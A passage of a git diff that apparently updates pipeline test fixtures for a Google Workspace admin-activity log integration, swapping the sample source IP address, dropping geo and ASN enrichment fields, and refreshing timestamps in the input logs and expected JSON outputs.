"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "DELETE_APPLICATION_SETTING", "id": "1", @@ -259,7 +205,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -283,35 +229,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876898800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"REORDER_GROUP_BASED_POLICIES_EVENT\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_PRIORITIES\",\"multiValue\":[\"a\",\"b\"]},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:24.232179800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"REORDER_GROUP_BASED_POLICIES_EVENT\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_PRIORITIES\",\"multiValue\":[\"a\",\"b\"]},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "REORDER_GROUP_BASED_POLICIES_EVENT", "id": "1", 
@@ -342,7 +270,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -366,35 +294,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876906100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"GPLUS_PREMIUM_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:24.232187800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"GPLUS_PREMIUM_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "GPLUS_PREMIUM_FEATURES", "id": "1", @@ -425,7 +335,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -447,35 +357,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876912200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:24.232194900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "CREATE_MANAGED_CONFIGURATION", "id": "1", @@ -505,7 +397,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -527,35 +419,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876918700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:24.232202500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "DELETE_MANAGED_CONFIGURATION", "id": "1", @@ -585,7 +459,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -607,35 +481,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876924200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"UPDATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:24.232209900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"UPDATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_MANAGED_CONFIGURATION", "id": "1", @@ -666,7 +522,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -688,35 +544,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876930100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED\",\"parameters\":[{\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION\",\"value\":\"FLASHLIGHT_EDU_SELECTION_MANUAL\"}]}}", + "ingested": "2021-12-09T13:38:24.232262300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED\",\"parameters\":[{\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION\",\"value\":\"FLASHLIGHT_EDU_SELECTION_MANUAL\"}]}}", "provider": "admin", "action": "FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED", "id": "1", 
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log index bcbed9ee886..6a2cc3c3072 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log 
@@ -1,13 +1,13 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"RENAME_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CHANGE_CALENDAR_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"CANCEL_CALENDAR_EVENTS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CALENDAR_SETTINGS","name":"RELEASE_CALENDAR_RESOURCES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_BUILDING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CREATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"DELETE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE_FEATURE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"RENAME_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"UPDATE_CALENDAR_RESOURCE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"FIELD_NAME","value":"field"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RESOURCE_IDENTIFIER","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CHANGE_CALENDAR_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"CANCEL_CALENDAR_EVENTS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CALENDAR_SETTINGS","name":"RELEASE_CALENDAR_RESOURCES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json
index 9b94370ef3f..053ba1dfa15 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json
@@ -10,7 +10,7 @@
 "foo"
 ],
 "ip": [
-"98.235.162.24"
+"67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.375100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:25.433465700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_BUILDING", "id": "1", @@ -92,7 +74,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
